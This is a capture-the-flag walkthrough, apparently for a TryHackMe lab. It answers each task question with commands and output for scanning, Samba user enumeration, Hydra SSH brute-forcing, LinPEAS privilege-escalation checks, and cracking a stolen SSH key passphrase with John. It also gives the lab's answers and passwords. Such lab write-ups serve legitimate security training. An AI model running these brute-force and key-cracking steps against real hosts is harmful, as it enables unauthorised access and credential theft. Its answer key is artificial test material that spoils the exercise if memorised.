Task 1. Web App Testing and Privilege Escalation
Question 1.
Deploy the machine and connect to our network
Start the machine and connect to the THM network using openvpn or the attack box.
Question 2.
Find the services exposed by the machine
Nmap
# nmap -p- -A 10.10.204.61
Output
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Found 6 ports open.
Question 3.
What is the name of the hidden directory on the web server(enter name without /)?
For this we are going to use gobuster with the dirbuster directory-medium wordlist
Gobuster
# gobuster dir -u http://10.10.204.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Scan returned 2 directories
Output
/development (Status: 301) [Size: 316] [–> http://10.10.20.44/development/]
/server-status (Status: 403) [Size: 299]
Answer 3.
/development
Question 4.
User brute-forcing to find the username & password
We could use hydra with username/password lists to try and bruteforce passwords but since we have Samba ports exposed we will enumerate Samba shares, using a tool called enum4linux
Note
Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.
enum4linux
# enum4linux -U -a 10.10.204.61
Output
Share Enumeration on 10.10.204.61
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Found 2 usernames and 2 shares.
Question 5.
What is the username?
Answer 5.
jan
Question 6.
What is the password?
OK since we have a username and port 22 (SSH) exposed we can try bruteforcing the password using Hydra in combination with the rockyou wordlist.
Note
Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
Hydra
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.204.61 ssh
Output
[22][ssh] host: 10.10.204.61 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Success, Hydra found the password
Answer 6. armando
Question 7. What service do you use to access the server(answer in abbreviation in all caps)?
From our initial nmap scan we know that port 22 SSH is open so we will connect to the server using Secure Shell using username jan and password armando.
# ssh [email protected]
enter the password and we are in.
Answer 7.
SSH
Question 8.
Enumerate the machine to find any vectors for privilege escalation
Now that we have access to the server with jan’s account we can automate this process using linpeas script, the script can be found:
Note
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz
So let’s get the script and copy it over to the server using jan’s credentials.
# git clone https://github.com/carlospolop/PEASS-ng.git
Navigate to the directory containing the linpeas.sh (PEASS-ng/linPEAS/linpeas.sh)
# scp linpeas.sh [email protected]:/tmp
Once the transfer is complete, run the script. This takes some time so be patient.
Script returned a lot of interesting files but most valuable of all are Kay’s private ssh keys.
Question 9.
What is the name of the other user you found(all lower case)?
We got that from question 4 (enum4linux).
Answer 9.
Kay
Question 10.
If you have found another user, what can you do with this information?
From the linpeas output we can see that Kay’s ssh private key is readable so we will exploit this to ssh-login with Kay and see if we can find the final password.
The location of the private key is
/home/kay/.ssh/
Question 11.
What is the final password you obtain?
OK so, in order to login with Kay’s private key you need to provide a passphrase (which we don’t know) since his key is password protected. Let’s store the key in a file for now.
$ cat /home/kay/.ssh/id_rsa
File containing the key on my local machine.
# nano /tmp/id_kay
Copy and paste the output to a file in your local pc.
Since we already have the private key we can try to figure out the password for the key using JohnTheRipper suite.
Note
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
Ssh2john is part of John The Reaper suite. This is a script that basically transforms [RSA/DSA/EC/OPENSSH (SSH private keys) ] private key to john format for later cracking using JtR
ssh2john
# /usr/share/john/ssh2john.py /tmp/id_kay > /tmp/s2j_kay
johntheripper
john /tmp/s2j_kay –wordlist =/usr/share/wordlist/rockyou.txt
Output
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
beeswax (/tmp/kay_id)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/sa6_123..*7¡Vamos!
Session completed
Success, john found the password beeswax. Now using this passphrase we can unlock Kay’s private key and log in to the server as kay.
SSH
Enter passphrase.. and we are in. Now let’s have a look at this pass.bak file.
$ cat pass.bak
Output
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Answer 11.
heresareallystrongpasswordthatfollowsthepasswordpolicy$$